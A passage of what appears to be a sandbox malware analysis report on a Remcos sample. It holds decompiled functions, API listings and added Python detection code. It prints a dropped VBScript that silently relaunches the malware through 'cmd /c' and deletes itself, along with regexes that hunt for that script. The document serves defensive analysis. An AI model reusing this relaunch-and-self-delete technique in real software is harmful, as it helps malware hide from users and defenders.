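SERVICES = {(80, "tcp"): "http", (53, "tcp"): "domain", (53, "udp"): "domain"}


def sockaddr_in(port, dotted):
    """Constructed 16-byte sockaddr_in: little-endian family, network-order port."""
    addr = bytes(int(x) for x in dotted.split("."))
    return AF_INET.to_bytes(2, "little") + port.to_bytes(2, "big") + addr + b"\x00" * 8


def inet_ntoa(raw4):
    """Model of ws2_32 #12: dotted-quad text for a 4-byte in_addr."""
    return ".".join(str(b) for b in raw4)


def getservbyport(port, proto):
    """Model of ws2_32 #56; proto None matches any protocol, as the real call does."""
    for (p, pr), name in SERVICES.items():
        if p == port and (proto is None or pr == proto):
            return name
    return None


def map_resolver_error(wsa_err):
    """The switch on WSAGetLastError() - 0x2af9 in the listing: three codes pass
    through unchanged, every other value collapses to WSAHOST_NOT_FOUND."""
    if wsa_err in (WSAHOST_NOT_FOUND, WSATRY_AGAIN, WSANO_RECOVERY):
        return wsa_err
    return WSAHOST_NOT_FOUND


def getnameinfo_model(sockaddr, hostlen, servlen, flags):
    """Return (status, host, serv). A length of 0 models a missing buffer."""
    if sockaddr is None or len(sockaddr) < 0x10:   # _a8 < 0x10: sizeof(sockaddr_in)
        return WSANO_RECOVERY, None, None
    family = int.from_bytes(sockaddr[0:2], "little")
    port = int.from_bytes(sockaddr[2:4], "big")    # sin_port is network order: ntohs (#15)
    addr = sockaddr[4:8]                            # sin_addr
    if family != AF_INET:
        return WSAEAFNOSUPPORT, None, None
    if hostlen == 0 and servlen == 0:
        return WSAHOST_NOT_FOUND, None, None
    both = NI_NUMERICHOST | NI_NAMEREQD
    if (flags & both) == both:                      # (_a28 & 6) == 6
        return WSAEINVAL, None, None

    serv = None
    if servlen:
        if flags & NI_NUMERICSERV:
            serv = "%u" % port
        else:
            # ASSUMPTION: the decompiler dropped the ternary's condition; the
            # conventional selector is NI_DGRAM -> "udp", otherwise NULL (any protocol).
            proto = "udp" if flags & NI_DGRAM else None
            serv = getservbyport(port, proto) or "%u" % port
        if servlen <= len(serv):                    # buffer must also hold the terminator
            return WSANO_RECOVERY, None, None

    host = None
    if hostlen:
        if flags & NI_NUMERICHOST:
            host = inet_ntoa(addr)
        else:
            name, err = HOSTS.get(addr, (None, WSAHOST_NOT_FOUND))
            if name:
                # NI_NOFQDN: strchr(name, '.') and terminate the string there
                host = name.split(".", 1)[0] if flags & NI_NOFQDN else name
            elif flags & NI_NAMEREQD:
                return map_resolver_error(err), None, serv
            else:
                host = inet_ntoa(addr)              # no name and none required: numeric form
        if hostlen <= len(host):
            return WSANO_RECOVERY, None, serv
    return 0, host, serv
```

Two details worth keeping in mind when comparing the model against the listing: both buffer checks use `<=`, so a result that exactly fills the caller's buffer is rejected with WSANO_RECOVERY rather than truncated, and any resolver error other than the three mapped codes is reported as WSAHOST_NOT_FOUND.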

























                                                                      0x00412189
                                                                      0x0041218c
                                                                      0x00412192
                                                                      0x00412196
                                                                      Statement addresses, one per C-code line of the preceding function (0x00000000 where none was recorded):
                                                                      0x0041219e 0x004121a2 0x004121ab 0x004121b2 0x00412350 0x00000000 0x004121c3 0x004121c5
                                                                      0x004121c9 0x00000000 0x004121cb 0x004121da 0x004121de 0x004121e2 0x004121e6 0x004121ee
                                                                      0x00000000 0x00000000 0x00000000 0x00000000 0x004121fc 0x004121fc 0x004121fc 0x00412202
                                                                      0x00412207 0x00412215 0x004122a5 0x004122aa 0x00412345 0x00000000 0x004122b8 0x004122b8
                                                                      0x004122bb 0x004122c2 0x004122ca 0x004122cf 0x004122d7 0x004122f7 0x004122fa 0x00412320
                                                                      0x00412324 0x00412324 0x0041232a 0x0041232c 0x00412335 0x00000000 0x00000000 0x0041233d
                                                                      0x00000000 0x00412342 0x004122fc 0x00412307 0x00412309 0x00412315 0x00000000 0x00412315
                                                                      0x0041230b 0x0041230e 0x00000000 0x00412319 0x00412313 0x00000000 0x00000000 0x00000000
                                                                      0x00412313 0x004122d9 0x004122dd 0x00000000 0x00000000 0x004122e2 0x004122e7 0x004122f0
                                                                      0x004122f2 0x004122f2 0x004122f0 0x00000000 0x004122e2 0x004122c4 0x00000000 0x004122c4
                                                                      0x00412223 0x00412223 0x00412227 0x0041222e 0x00412235 0x0041223e 0x00412242 0x00412246
                                                                      0x0041224e 0x0041225c 0x0041225c 0x00412260 0x00412260 0x00412276 0x0041227b 0x0041227f
                                                                      0x00412282 0x0041228b 0x00000000 0x00000000 0x0041229a 0x0041229f 0x004122a4 0x00000000
                                                                      0x004122a4 0x00412250 0x00412254 0x00000000 0x00000000 0x00412256 0x00000000 0x00412256
                                                                      0x00412230 0x00000000 0x00412230 0x00412215 0x00000000 0x00412209 0x004121e6

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 65535$udp
                                                                      • API String ID: 0-1267037602
                                                                      • Opcode ID: 31821f55b8d9277e01db58fcdc86719a36b7115fc0a81b7230a33fe71a4743ca
                                                                      • Instruction ID: ae91068980d7d96a9e8edf194e4aba947a5305d5091cc1e6aca1b6646d697b82
                                                                      • Opcode Fuzzy Hash: 31821f55b8d9277e01db58fcdc86719a36b7115fc0a81b7230a33fe71a4743ca
                                                                      • Instruction Fuzzy Hash: B85114316083069BD3248A64EA05BAB77A4AF89704F08042FFC65D6391E7FCD9E1971E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00452D6F), ref: 00451C98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DecodePointer
                                                                      • String ID: <@$acos$asin$exp$log$log10$o-E$pow$sqrt
                                                                      • API String ID: 3527080286-1913709634
                                                                      • Opcode ID: ce6f11cd7ac8e5f6465fbe9480caa101cbffab63acf0c775b6aef6915568fb52
                                                                      • Instruction ID: 4d42ff924c0f6c0d5069b56fe5caa6540bd7368ddd0efee2bde0047ccff7ba1b
                                                                      • Opcode Fuzzy Hash: ce6f11cd7ac8e5f6465fbe9480caa101cbffab63acf0c775b6aef6915568fb52
                                                                      • Instruction Fuzzy Hash: 5D517E70900509CBCF109F98E9486ADBBB4FB49306F504197DC81AA276C77A9D2CC71D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			// Editor's annotations (the // comments) are not decompiler output; they rely only on the
                                                                      			// API calls and string constants that the report lists for this function below.
                                                                      			E0040B630(void* __ebx, void* __eflags) {
                                                                      				char _v28;
                                                                      				char _v52;
                                                                      				char _v76;
                                                                      				char _v100;
                                                                      				char _v124;
                                                                      				char _v148;
                                                                      				char _v172;
                                                                      				char _v196;
                                                                      				short _v716;
                                                                      				void* __edi;
                                                                      				void* __ebp;
                                                                      				void* _t36;
                                                                      				void* _t37;
                                                                      				void* _t40;
                                                                      				void* _t54;
                                                                      				void* _t67;
                                                                      				void* _t68;
                                                                      				void* _t79;
                                                                      				void* _t137;
                                                                      
                                                                      				_t79 = __ebx;
                                                                      				E0041030A();
                                                                      				_t36 = E0040243C();
                                                                      				_t37 = E00401F6B(0x46e5e8);
                                                                      				// Read the registry value "exepath" from a key under HKEY_CURRENT_USER (RegOpenKeyExA with
                                                                      				// 0x80000001; the key name at 0x46e5a0 is not shown here) into the 0x208-byte buffer _v716.
                                                                      				_t40 = E00410C6B(E00401F6B(0x46e5a0), "exepath",  &_v716, 0x208, _t37, _t36);
                                                                      				_t141 = _t40;
                                                                      				if(_t40 == 0) {
                                                                      					// No stored path: fall back to the running module's own path.
                                                                      					GetModuleFileNameW(0,  &_v716, 0x208);
                                                                      				}
                                                                      				// Script path = <Temp>\<name>.vbs; the name comes from E00418385/E00418114 and is not visible here.
                                                                      				E00402FD4(_t79,  &_v124, E00418385( &_v52, E00418114( &_v76)), 0, _t137, _t141, L".vbs");
                                                                      				E00401EC9();
                                                                      				E00401F98();
                                                                      				E004042DD(_t79,  &_v100, E00402FD4(_t79,  &_v76, E0040413E(_t79,  &_v52, _t42, _t137, E00438A0F(_t79,  &_v76, _t141, L"Temp")), 0, _t137, _t141, "\\"), _t137, _t141,  &_v124);
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401F46(_t79,  &_v28);
                                                                      				// First script line: CreateObject("WScript.Shell").Run "cmd /c ""<exepath>""", 0
                                                                      				// (doubled quotes are VBScript's escaped quote; the trailing 0 runs the relaunched binary with a hidden window).
                                                                      				_t54 = E0040413E(_t79,  &_v196, _t49, _t137, L"\"\"\", 0");
                                                                      				E0040321D(E00402FD4(_t79,  &_v76, E00402F65( &_v52, E00402FD4(_t79,  &_v148, E0040413E(_t79,  &_v172, _t49, _t137, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0, _t137, _t141,  &_v716), _t54), 0, _t137, _t141, "\n"));
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				// Second script line: the script deletes itself once it has run.
                                                                      				L00407735(_t79,  &_v28, 0, _t137, L"CreateObject(\"Scripting.FileSystemObject\").DeleteFile(Wscript.ScriptFullName)");
                                                                      				_t67 = E00401EC4( &_v100);
                                                                      				_t68 = E0040243C();
                                                                      				E00401EC4( &_v28);
                                                                      				// E00418911 presumably writes the script (its size argument is twice the count from E0040243C).
                                                                      				// ShellExecuteW "open" then runs the .vbs with nShowCmd 0 (SW_HIDE); a return value above 32
                                                                      				// means success, after which this process exits and leaves the relaunched copy running.
                                                                      				if(E00418911(_t68 + _t68, _t67, 0) != 0 && ShellExecuteW(0, L"open", E00401EC4( &_v100), 0x4610ec, 0x4610ec, 0) > 0x20) {
                                                                      					ExitProcess(0);
                                                                      				}
                                                                      				E00401EC9();
                                                                      				E00401EC9();
                                                                      				return E00401EC9();
                                                                      			}

                                                                      Statement addresses for E0040B630, one per C-code line above:
                                                                      0x0040b630 0x0040b63b 0x0040b647 0x0040b64f 0x0040b673 0x0040b67d 0x0040b67f 0x0040b68a
                                                                      0x0040b68a 0x0040b6ac 0x0040b6b5 0x0040b6bd 0x0040b6ef 0x0040b6f8 0x0040b700 0x0040b708
                                                                      0x0040b71d 0x0040b762 0x0040b76a 0x0040b772 0x0040b77d 0x0040b788 0x0040b793 0x0040b7a0
                                                                      0x0040b7a9 0x0040b7b2 0x0040b7be 0x0040b7d0 0x0040b7f5 0x0040b7f5 0x0040b7fe 0x0040b806
                                                                      0x0040b818

                                                                      APIs
                                                                        • Part of subcall function 0041030A: TerminateProcess.KERNEL32(00000000,0046E588,0040D393), ref: 0041031A
                                                                        • Part of subcall function 0041030A: WaitForSingleObject.KERNEL32(000000FF), ref: 0041032D
                                                                        • Part of subcall function 00410C6B: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046E5A0), ref: 00410C87
                                                                        • Part of subcall function 00410C6B: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410CA0
                                                                        • Part of subcall function 00410C6B: RegCloseKey.ADVAPI32(00000000), ref: 00410CAB
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B68A
                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,004610EC,004610EC,00000000), ref: 0040B7E9
                                                                      • ExitProcess.KERNEL32 ref: 0040B7F5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                      • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                      • API String ID: 1913171305-2411266221
                                                                      • Opcode ID: 8bd3bb04db83121c22f445a1564e59127c72aec3aaa4961ef53ac7f3946c6543
                                                                      • Instruction ID: f8e7d5a33d4c2048acc725ad2923984ed36cecf8b18b684af341db1542bedc50
                                                                      • Opcode Fuzzy Hash: 8bd3bb04db83121c22f445a1564e59127c72aec3aaa4961ef53ac7f3946c6543
                                                                      • Instruction Fuzzy Hash: 6E415E329101185ACB04F762DC96DEE7379AF50708F50017FF406B71E2EE381E8ACA99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
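
The function E0040B630 above drops a two-line VBScript into the user's Temp folder that relaunches the stored "exepath" binary through cmd /c with a hidden window and then deletes itself, so the only durable traces are the transient .vbs file and the wscript.exe to cmd.exe process chain. The following Python is an added example, not code from the Joe Sandbox report or from the Remcos sample: it rebuilds the script from the string constants shown in the decompiled code, classifies .vbs files found in a directory, and checks process telemetry for the relaunch chain. The path C:\Example\payload.exe, the telemetry record shape, the dropped file's encoding, and the assumption that wscript.exe is the handler ShellExecuteW "open" picks for a .vbs are all constructed for the example.

```python
"""Added example, not code from the Joe Sandbox report or from the Remcos sample:
rebuild the script that E0040B630 assembles and hunt for it on disk and in process telemetry."""
import re
import tempfile
from pathlib import Path, PureWindowsPath

# String constants exactly as they appear in the decompiled function above.
RUN_PREFIX = 'CreateObject("WScript.Shell").Run "cmd /c ""'
RUN_SUFFIX = '""", 0'   # doubled quotes are VBScript's escaped quote; 0 = hidden window
DELETE_SELF = 'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)'


def build_relaunch_script(exe_path):
    """Concatenate in the order the decompiled code does: Run line, newline, self-delete line."""
    return RUN_PREFIX + exe_path + RUN_SUFFIX + "\n" + DELETE_SELF


_RUN_RE = re.compile(r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c ""(.+?)""",\s*0', re.IGNORECASE)
_DEL_RE = re.compile(r'\.DeleteFile\(\s*WScript\.ScriptFullName\s*\)', re.IGNORECASE)


def classify_vbs(text):
    """Return details if text is a hidden cmd /c relaunch script, else None."""
    m = _RUN_RE.search(text)
    if m is None:
        return None
    return {"exe_path": m.group(1), "hidden_window": True,
            "self_deleting": _DEL_RE.search(text) is not None}


def _decode(data):
    # The report does not show the dropped file's encoding; accept UTF-16LE (BOM or not) and 8-bit text.
    if data.startswith(b"\xff\xfe") or b"\x00" in data[:64]:
        return data.decode("utf-16-le", errors="ignore").lstrip("\ufeff")
    return data.decode("latin-1")


def scan_vbs_dir(directory):
    """Classify every *.vbs in a directory, e.g. the user's Temp folder the sample writes to."""
    hits = []
    for path in sorted(Path(directory).glob("*.vbs")):
        info = classify_vbs(_decode(path.read_bytes()))
        if info is not None:
            info["script"] = str(path)
            hits.append(info)
    return hits


def find_relaunch_chains(events):
    """Process-tree check: wscript.exe running a .vbs whose child is cmd.exe /c "<exe>".
    events: dicts with pid, ppid, image, cmdline (an assumed telemetry shape). That the .vbs is
    handled by wscript.exe is an assumption: ShellExecuteW("open") hands it to the registered
    handler, which is wscript.exe on a default Windows install."""
    by_pid = {e["pid"]: e for e in events}
    chains = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        if (PureWindowsPath(parent["image"]).name.lower() == "wscript.exe"
                and ".vbs" in parent["cmdline"].lower()
                and PureWindowsPath(e["image"]).name.lower() == "cmd.exe"):
            m = re.search(r'/c\s+"([^"]+)"', e["cmdline"], re.IGNORECASE)
            if m:
                chains.append({"script_cmdline": parent["cmdline"], "relaunched": m.group(1)})
    return chains


def demo():
    """Drop a constructed script into a temp dir, scan it, and run the chain check on constructed events."""
    exe = r"C:\Example\payload.exe"   # constructed, not a path from the sample
    with tempfile.TemporaryDirectory() as tmp:
        Path(tmp, "x.vbs").write_bytes(build_relaunch_script(exe).encode("utf-16-le"))
        Path(tmp, "benign.vbs").write_text('MsgBox "hello"')
        disk_hits = scan_vbs_dir(tmp)
    events = [  # constructed telemetry for the chain the script produces
        {"pid": 100, "ppid": 1, "image": r"C:\Windows\System32\wscript.exe",
         "cmdline": r"wscript.exe C:\Users\bob\AppData\Local\Temp\x.vbs"},
        {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
         "cmdline": 'cmd /c "' + exe + '"'},
        {"pid": 102, "ppid": 101, "image": exe, "cmdline": exe},
    ]
    return disk_hits, find_relaunch_chains(events)


if __name__ == "__main__":
    print(demo())
```

Because the script deletes itself as its last action, the on-disk scan only catches it in the window between the write and the relaunch; the process-chain check is the more reliable signal on a host with process creation logging, and the exepath it extracts is the binary to acquire and compare against the original sample.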

                                                                      C-Code - Quality: 100%
                                                                      			// Editor's annotations (the // comments) are not decompiler output. This is a runtime-library
                                                                      			// helper with no malware-specific logic: it widens an 8-bit input string, hands it to a
                                                                      			// wide-character worker, and narrows the result into the caller's buffer.
                                                                      			E0043717A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                      				int _v8;
                                                                      				int _v12;
                                                                      				char _v16;
                                                                      				intOrPtr _v24;
                                                                      				char _v28;
                                                                      				void* __ebx;
                                                                      				char* _t31;
                                                                      				int _t35;
                                                                      				int _t43;
                                                                      				void* _t51;
                                                                      				int _t52;
                                                                      				int _t54;
                                                                      				void* _t56;
                                                                      				void* _t63;
                                                                      				short* _t64;
                                                                      				short* _t67;
                                                                      
                                                                      				_t62 = __edx;
                                                                      				E004370F7(_t51,  &_v28, __edx, _a24);
                                                                      				_t52 = 0;
                                                                      				// _t54/_v8: code page taken from the locale structure set up by E004370F7 (presumed).
                                                                      				_t54 =  *(_v24 + 0x14);
                                                                      				_t31 = _a4;
                                                                      				_v8 = _t54;
                                                                      				if(_t31 == 0) {
                                                                      					L4:
                                                                      					// Argument validation failure: 0x16 is EINVAL (22). E00439941 and E0043862C look like the
                                                                      					// CRT errno accessor and invalid-parameter handler.
                                                                      					 *((intOrPtr*)(E00439941())) = 0x16;
                                                                      					E0043862C();
                                                                      					L18:
                                                                      					if(_v16 != 0) {
                                                                      						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                      					}
                                                                      					return _t52;
                                                                      				}
                                                                      				_t66 = _a8;
                                                                      				if(_a8 == 0) {
                                                                      					goto L4;
                                                                      				}
                                                                      				 *_t31 = 0;
                                                                      				if(_a12 == 0 || _a16 == 0) {
                                                                      					goto L4;
                                                                      				} else {
                                                                      					// 0xffffffff = -1 length (NUL-terminated). The first call sizes the wide buffer, the second converts into it;
                                                                      					// by usage E004421F7 allocates 2*count bytes and E004427C2 releases the buffers below.
                                                                      					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                                                                      					_v12 = _t35;
                                                                      					if(_t35 != 0) {
                                                                      						_t64 = E004421F7(_t54, _t35 + _t35);
                                                                      						_t56 = _t63;
                                                                      						if(_t64 != 0) {
                                                                      							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                                                                      								_t67 = E004421F7(_t56, _t66 + _t66);
                                                                      								if(_t67 != 0) {
                                                                      									// The wide-character worker writes at most _a8 characters into _t67; _a16.._a24 pass through untouched.
                                                                      									_t43 = E00443A20(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                                                                      									_v12 = _t43;
                                                                      									if(_t43 != 0) {
                                                                      										// Narrow the result back into the caller's _a4 buffer of _a8 bytes. The return value is the
                                                                      										// worker's count (_v12) or 0 on failure, with GetLastError() mapped by E0043990B (presumably to errno).
                                                                      										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                                                                      											_t52 = _v12;
                                                                      										} else {
                                                                      											E0043990B(GetLastError());
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								E004427C2(_t67);
                                                                      							} else {
                                                                      								E0043990B(GetLastError());
                                                                      							}
                                                                      						}
                                                                      						E004427C2(_t64);
                                                                      					} else {
                                                                      						E0043990B(GetLastError());
                                                                      					}
                                                                      					goto L18;
                                                                      				}
                                                                      			}
                                                                      Instruction addresses (one per C-Code line, in listing order):
                                                                      0x0043717a 0x0043718a 0x00437192 0x00437194 0x00437197 0x0043719a 0x0043719f 0x004371b4
                                                                      0x004371b9 0x004371bf 0x00437291 0x00437295 0x0043729a 0x0043729a 0x004372a8 0x004372a8
                                                                      0x004371a1 0x004371a6 0x00000000 0x00000000 0x004371a8 0x004371ad 0x00000000 0x004371c9
                                                                      0x004371d2 0x004371d8 0x004371dd 0x004371fa 0x004371fc 0x004371ff 0x0043721a 0x00437233
                                                                      0x00437238 0x00437248 0x00437250 0x00437255 0x0043726e 0x0043727f 0x00437270 0x00437277
                                                                      0x0043727c 0x0043726e 0x00437255 0x00437283 0x0043721c 0x00437223 0x00437223 0x00437288
                                                                      0x0043728a 0x004371df 0x004371e6 0x004371eb 0x00000000 0x004371dd

                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004371D2
                                                                      • GetLastError.KERNEL32(?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004371DF
                                                                      • __dosmaperr.LIBCMT ref: 004371E6
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00437212
                                                                      • GetLastError.KERNEL32(?,?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043721C
                                                                      • __dosmaperr.LIBCMT ref: 00437223
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D15,?), ref: 00437266
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00401D15,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00437270
                                                                      • __dosmaperr.LIBCMT ref: 00437277
                                                                      • _free.LIBCMT ref: 00437283
                                                                      • _free.LIBCMT ref: 0043728A
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                      • String ID:
                                                                      • API String ID: 2441525078-0
                                                                      • Opcode ID: 23444667afc1a1e6baa4739f47f4e0ea3ebaed748cf7b77ebe9eb0028f7abf96
                                                                      • Instruction ID: 08740670cb7e6ff56e8558ad400acf98d04cadd4c0b89948628c33e964d09179
                                                                      • Opcode Fuzzy Hash: 23444667afc1a1e6baa4739f47f4e0ea3ebaed748cf7b77ebe9eb0028f7abf96
                                                                      • Instruction Fuzzy Hash: 8531F5B240820ABFDF21AFA6CC449AF3B78EF09368F10429AF85056351DB39CD51DB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E0041CE00(short* __edx) {
                                                                      				char _v52;
                                                                      				intOrPtr _v56;
                                                                      				char _v60;
                                                                      				short _v64;
                                                                      				short* _v68;
                                                                      				signed int _v72;
                                                                      				void* _t40;
                                                                      				void* _t43;
                                                                      				void* _t46;
                                                                      				void* _t56;
                                                                      				intOrPtr _t59;
                                                                      				void* _t61;
                                                                      				intOrPtr _t62;
                                                                      				void* _t64;
                                                                      				void* _t65;
                                                                      				char* _t66;
                                                                      				signed int _t67;
                                                                      				signed int _t69;
                                                                      				intOrPtr _t73;
                                                                      				void* _t77;
                                                                      				short* _t79;
                                                                      				intOrPtr* _t80;
                                                                      				char* _t81;
                                                                      				void* _t82;
                                                                      				void* _t83;
                                                                      				signed int* _t86;
                                                                      				signed int* _t87;
                                                                      
                                                                      				_v68 = __edx;
                                                                      				_v72 = _v72 & 0;
                                                                      				_t83 = 0;
                                                                      				_v64 = 0;
                                                                      				_v60 = 0;
                                                                      				_v56 = E0040BC3F();
                                                                      				_t81 = "TLS_AES_128_GCM_SHA256";
                                                                      				if(__edx == 0) {
                                                                      					L33:
                                                                      					return 0;
                                                                      				}
                                                                      				_t40 = E004386A0(_t81, "ALL", 3);
                                                                      				_t86 =  &(( &_v72)[3]);
                                                                      				if(_t40 == 0) {
                                                                      					L32:
                                                                      					return 1;
                                                                      				}
                                                                      				_t43 = E004386A0(_t81, "DEFAULT", 7);
                                                                      				_t87 =  &(_t86[3]);
                                                                      				if(_t43 == 0) {
                                                                      					goto L32;
                                                                      				} else {
                                                                      					goto L3;
                                                                      				}
                                                                      				do {
                                                                      					L3:
                                                                      					_t66 = _t81;
                                                                      					_t82 = E00435320(_t81, 0x46722c);
                                                                      					_pop(_t69);
                                                                      					if(_t82 != 0) {
                                                                      						_t46 = _t82 - _t66;
                                                                      					} else {
                                                                      						_t46 = E004372D0(_t66);
                                                                      						_pop(_t69);
                                                                      					}
                                                                      					if(_t46 <= 0x31) {
                                                                      						if(_t82 != 0) {
                                                                      							_t77 = _t82 - _t66;
                                                                      						} else {
                                                                      							_t65 = E004372D0(_t66);
                                                                      							_pop(_t69);
                                                                      							_t77 = _t65;
                                                                      						}
                                                                      					} else {
                                                                      						_t77 = 0x31;
                                                                      					}
                                                                      					E0043E110( &_v52, _t66, _t77);
                                                                      					_t87 =  &(_t87[3]);
                                                                      					_t8 = _t77 - 1; // -1
                                                                      					_t78 =  ==  ? _t8 : _t77; // decompiler emitted no operands for this comparison
                                                                      					_t67 = 0;
                                                                      					 *((char*)(_t87 + ( ==  ? _t8 : _t77) + 0x24)) = 0; // NUL-terminates the copied token in _v52
                                                                      					if(_v56 <= 0) {
                                                                      						L16:
                                                                      						_t79 = _v68;
                                                                      					} else {
                                                                      						_t80 = 0x462220;
                                                                      						while(1) {
                                                                      							_t12 = _t80 - 4; // 0x4677ec
                                                                      							_t56 = E004386A0( &_v52,  *_t12, 0x31);
                                                                      							_t87 =  &(_t87[3]);
                                                                      							if(_t56 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t64 = E004386A0( &_v52,  *_t80, 0x31);
                                                                      							_t87 =  &(_t87[3]);
                                                                      							if(_t64 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t67 = _t67 + 1;
                                                                      							_t80 = _t80 + 0xc;
                                                                      							if(_t67 < _v56) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L16;
                                                                      						}
                                                                      						_t73 = _v64;
                                                                      						if(_t73 >= 0x12b) {
                                                                      							goto L33;
                                                                      						}
                                                                      						_t79 = _v68;
                                                                      						_t69 = _t67 * 0xc;
                                                                      						 *((char*)(_t79 + _t73 + 4)) =  *((intOrPtr*)(_t69 + 0x462224));
                                                                      						 *((char*)(_t79 + _t73 + 5)) =  *((intOrPtr*)(_t69 + 0x462225));
                                                                      						_t59 =  *((intOrPtr*)(_t69 + 0x462224));
                                                                      						_v64 = _t73 + 2;
                                                                      						if(_t59 == 0x13) {
                                                                      							L30:
                                                                      							_v72 = 1;
                                                                      							L31:
                                                                      							_t83 = 1;
                                                                      							goto L17;
                                                                      						}
                                                                      						if(_t59 != 0xc0) {
                                                                      							L26:
                                                                      							if(_v72 != 0) {
                                                                      								L28:
                                                                      								if(_v60 == 0) {
                                                                      									_v60 = 1;
                                                                      								}
                                                                      								goto L31;
                                                                      							}
                                                                      							_t61 = E00435320( &_v52, "ECDSA");
                                                                      							_pop(_t69);
                                                                      							if(_t61 != 0) {
                                                                      								goto L30;
                                                                      							}
                                                                      							goto L28;
                                                                      						}
                                                                      						_t62 =  *((intOrPtr*)(_t69 + 0x462225));
                                                                      						if(_t62 == 0xb4 || _t62 == 0xb5) {
                                                                      							goto L30;
                                                                      						} else {
                                                                      							goto L26;
                                                                      						}
                                                                      					}
                                                                      					L17:
                                                                      					_t81 = _t82 + 1;
                                                                      				} while (_t82 != 0);
                                                                      				if(_t83 != 0) {
                                                                      					_push(_t69);
                                                                      					 *_t79 = _v64;
                                                                      					 *((char*)(_t79 + 0x154)) = 1;
                                                                      					E0041A312(_t79, _v72, _v60, _t69, 1);
                                                                      				}
                                                                      				return _t83;
                                                                      			}
                                                                      Instruction addresses (one per C-Code line, in listing order):
                                                                      0x0041ce07 0x0041ce0b 0x0041ce0f 0x0041ce13 0x0041ce17 0x0041ce20 0x0041ce24 0x0041ce2b
                                                                      0x0041cfce 0x00000000 0x0041cfce 0x0041ce39 0x0041ce3e 0x0041ce43 0x0041cfc9 0x00000000
                                                                      0x0041cfcb 0x0041ce51 0x0041ce56 0x0041ce5b 0x00000000 0x00000000 0x00000000 0x00000000
                                                                      0x0041ce61 0x0041ce61 0x0041ce67 0x0041ce6e 0x0041ce71 0x0041ce74 0x0041ce81 0x0041ce76
                                                                      0x0041ce77 0x0041ce7c 0x0041ce7c 0x0041ce86 0x0041ce8f 0x0041ce9e 0x0041ce91 0x0041ce92
                                                                      0x0041ce97 0x0041ce98 0x0041ce98 0x0041ce88 0x0041ce8a 0x0041ce8a 0x0041cea7 0x0041ceac
